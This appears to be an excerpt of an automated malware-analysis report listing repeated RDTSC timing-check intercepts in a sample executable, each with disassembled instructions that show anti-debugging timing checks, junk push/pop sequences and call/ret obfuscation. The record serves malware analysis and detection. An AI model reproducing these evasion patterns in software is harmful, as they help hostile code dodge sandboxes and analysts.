Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F8B48D second address: F8B496 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F8B496 second address: F8B4AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jmp 00007F36B8D8D08Ch 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F8B4AC second address: F8B4B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F8B5F0 second address: F8B609 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F36B8D8D08Eh 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F8B609 second address: F8B60D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F8BA1B second address: F8BA25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F36B8D8D086h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F8BCDA second address: F8BCE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007F36B8869BF6h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F8BCE5 second address: F8BD12 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8D8D08Eh 0x00000007 pushad 0x00000008 jmp 00007F36B8D8D098h 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F8BD12 second address: F8BD2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 jng 00007F36B8869C1Ch 0x0000000d jp 00007F36B8869BFCh 0x00000013 jc 00007F36B8869BF6h 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F8BD2F second address: F8BD3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36B8D8D08Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F8C015 second address: F8C01D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F8C01D second address: F8C022 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F8C022 second address: F8C02A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F8C02A second address: F8C046 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 pop edx 0x00000009 jmp 00007F36B8D8D093h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F8C046 second address: F8C04C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F8C1A8 second address: F8C1AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F8C1AC second address: F8C1B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F8C996 second address: F8C9A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F36B8D8D086h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F8CAEE second address: F8CAF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F91D10 second address: F91D2B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36B8D8D092h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F91D2B second address: F91D2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F91EAF second address: F91EB4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F91EB4 second address: F91EE9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869BFFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F36B8869C03h 0x00000011 jbe 00007F36B8869BF6h 0x00000017 popad 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F906C5 second address: F906E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8D8D097h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F36B8D8D086h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F90EBB second address: F90EC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F90EC1 second address: F90ED2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F36B8D8D08Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F92007 second address: F92016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop edi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F93256 second address: F9325A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F9325A second address: F93260 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F93260 second address: F93266 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F63C16 second address: F63C1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F63C1C second address: F63C22 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F9A319 second address: F9A31D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F581D0 second address: F581D6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F581D6 second address: F581DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F581DA second address: F581E6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F581E6 second address: F581EC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F998CF second address: F998DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jns 00007F36B8D8D086h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F99A33 second address: F99A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F99A37 second address: F99A4B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jng 00007F36B8D8D08Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F99A4B second address: F99A82 instructions: 0x00000000 rdtsc 0x00000002 jg 00007F36B8869C1Ah 0x00000008 jmp 00007F36B8869C04h 0x0000000d jmp 00007F36B8869C00h 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 ja 00007F36B8869BF6h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F99E93 second address: F99E97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F99E97 second address: F99ED6 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F36B8869BF6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007F36B8869C08h 0x00000011 popad 0x00000012 push eax 0x00000013 push edx 0x00000014 jng 00007F36B8869C05h 0x0000001a jmp 00007F36B8869BFFh 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F99ED6 second address: F99EED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F36B8D8D092h 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F99EED second address: F99EF4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F9A05C second address: F9A07B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jg 00007F36B8D8D086h 0x00000009 jbe 00007F36B8D8D086h 0x0000000f pop esi 0x00000010 pushad 0x00000011 jnc 00007F36B8D8D086h 0x00000017 jg 00007F36B8D8D086h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F9C316 second address: F9C31B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F9C31B second address: F9C320 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F9C452 second address: F9C458 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F9C5B9 second address: F9C5C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007F36B8D8D086h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F9C911 second address: F9C915 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F9D062 second address: F9D066 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F9D066 second address: F9D06A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F9D06A second address: F9D070 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F9D19B second address: F9D19F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F9D2D0 second address: F9D2E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8D8D092h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F9D2E6 second address: F9D2F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F36B8869BF6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F9D9A7 second address: F9D9AD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F9D9AD second address: F9D9B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F36B8869BF6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F9D9B8 second address: F9D9CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 jng 00007F36B8D8D098h 0x0000000e push eax 0x0000000f push edx 0x00000010 js 00007F36B8D8D086h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F9D9CE second address: F9DA44 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F36B8869BF6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b mov edi, eax 0x0000000d call 00007F36B8869BFEh 0x00000012 mov dword ptr [ebp+122D29E2h], ecx 0x00000018 pop esi 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push edi 0x0000001e call 00007F36B8869BF8h 0x00000023 pop edi 0x00000024 mov dword ptr [esp+04h], edi 0x00000028 add dword ptr [esp+04h], 00000017h 0x00000030 inc edi 0x00000031 push edi 0x00000032 ret 0x00000033 pop edi 0x00000034 ret 0x00000035 mov si, di 0x00000038 push 00000000h 0x0000003a push 00000000h 0x0000003c push ebx 0x0000003d call 00007F36B8869BF8h 0x00000042 pop ebx 0x00000043 mov dword ptr [esp+04h], ebx 0x00000047 add dword ptr [esp+04h], 0000001Bh 0x0000004f inc ebx 0x00000050 push ebx 0x00000051 ret 0x00000052 pop ebx 0x00000053 ret 0x00000054 xchg eax, ebx 0x00000055 jl 00007F36B8869C04h 0x0000005b push eax 0x0000005c push edx 0x0000005d push eax 0x0000005e push edx 0x0000005f rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F9DA44 second address: F9DA48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F9DA48 second address: F9DA59 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jbe 00007F36B8869BF8h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F9E1F8 second address: F9E201 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F9F441 second address: F9F4A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8869C05h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007F36B8869BF8h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 jmp 00007F36B8869BFAh 0x0000002b push 00000000h 0x0000002d pushad 0x0000002e mov dl, al 0x00000030 popad 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 jmp 00007F36B8869C03h 0x00000039 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F9FEE2 second address: F9FEE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F9FEE8 second address: F9FEED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F9FEED second address: F9FF6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8D8D08Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push ecx 0x0000000b pushad 0x0000000c jno 00007F36B8D8D086h 0x00000012 jmp 00007F36B8D8D08Ah 0x00000017 popad 0x00000018 pop ecx 0x00000019 nop 0x0000001a push 00000000h 0x0000001c push edx 0x0000001d call 00007F36B8D8D088h 0x00000022 pop edx 0x00000023 mov dword ptr [esp+04h], edx 0x00000027 add dword ptr [esp+04h], 0000001Ch 0x0000002f inc edx 0x00000030 push edx 0x00000031 ret 0x00000032 pop edx 0x00000033 ret 0x00000034 jmp 00007F36B8D8D08Bh 0x00000039 push 00000000h 0x0000003b mov dword ptr [ebp+12454375h], ecx 0x00000041 push 00000000h 0x00000043 xor di, 648Ah 0x00000048 xchg eax, ebx 0x00000049 jmp 00007F36B8D8D08Dh 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 jmp 00007F36B8D8D08Bh 0x00000056 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: F9FF6F second address: F9FF74 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FA08FF second address: FA0904 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FA0904 second address: FA0993 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F36B8869BF8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push ecx 0x0000000e jmp 00007F36B8869C05h 0x00000013 pop ecx 0x00000014 nop 0x00000015 jc 00007F36B8869BFCh 0x0000001b mov edi, dword ptr [ebp+122D1AC3h] 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push esi 0x00000026 call 00007F36B8869BF8h 0x0000002b pop esi 0x0000002c mov dword ptr [esp+04h], esi 0x00000030 add dword ptr [esp+04h], 00000014h 0x00000038 inc esi 0x00000039 push esi 0x0000003a ret 0x0000003b pop esi 0x0000003c ret 0x0000003d push 00000000h 0x0000003f push 00000000h 0x00000041 push ebx 0x00000042 call 00007F36B8869BF8h 0x00000047 pop ebx 0x00000048 mov dword ptr [esp+04h], ebx 0x0000004c add dword ptr [esp+04h], 0000001Bh 0x00000054 inc ebx 0x00000055 push ebx 0x00000056 ret 0x00000057 pop ebx 0x00000058 ret 0x00000059 mov edi, dword ptr [ebp+122D2A57h] 0x0000005f push eax 0x00000060 jbe 00007F36B8869C0Eh 0x00000066 push eax 0x00000067 push edx 0x00000068 jmp 00007F36B8869BFCh 0x0000006d rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FA14FD second address: FA1522 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F36B8D8D093h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F36B8D8D08Ah 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FA2092 second address: FA209C instructions: 0x00000000 rdtsc 0x00000002 jo 00007F36B8869BFCh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FA1E3F second address: FA1E4E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FA209C second address: FA2104 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007F36B8869BF8h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 0000001Ch 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 jc 00007F36B8869BFCh 0x00000027 sub dword ptr [ebp+12456E06h], esi 0x0000002d push 00000000h 0x0000002f jmp 00007F36B8869C00h 0x00000034 jmp 00007F36B8869C00h 0x00000039 push 00000000h 0x0000003b mov esi, dword ptr [ebp+12456133h] 0x00000041 xchg eax, ebx 0x00000042 push eax 0x00000043 push edx 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 popad 0x00000048 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FA2104 second address: FA210A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FA210A second address: FA210F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FA210F second address: FA211D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FA2CCB second address: FA2D08 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F36B8869C06h 0x00000008 jmp 00007F36B8869C00h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 pushad 0x00000011 jmp 00007F36B8869C09h 0x00000016 push eax 0x00000017 push edx 0x00000018 jp 00007F36B8869BF6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FA2D08 second address: FA2D3E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007F36B8D8D088h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 0000001Dh 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 push 00000000h 0x00000024 push 00000000h 0x00000026 xchg eax, ebx 0x00000027 pushad 0x00000028 push esi 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FA2D3E second address: FA2D46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FA2D46 second address: FA2D4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Dl6wuWiQdg.exe	RDTSC instruction interceptor: First address: FA55A0 second address: FA55C1 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F36B8869C04h 0x0000000b popad 0x0000000c push eax 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
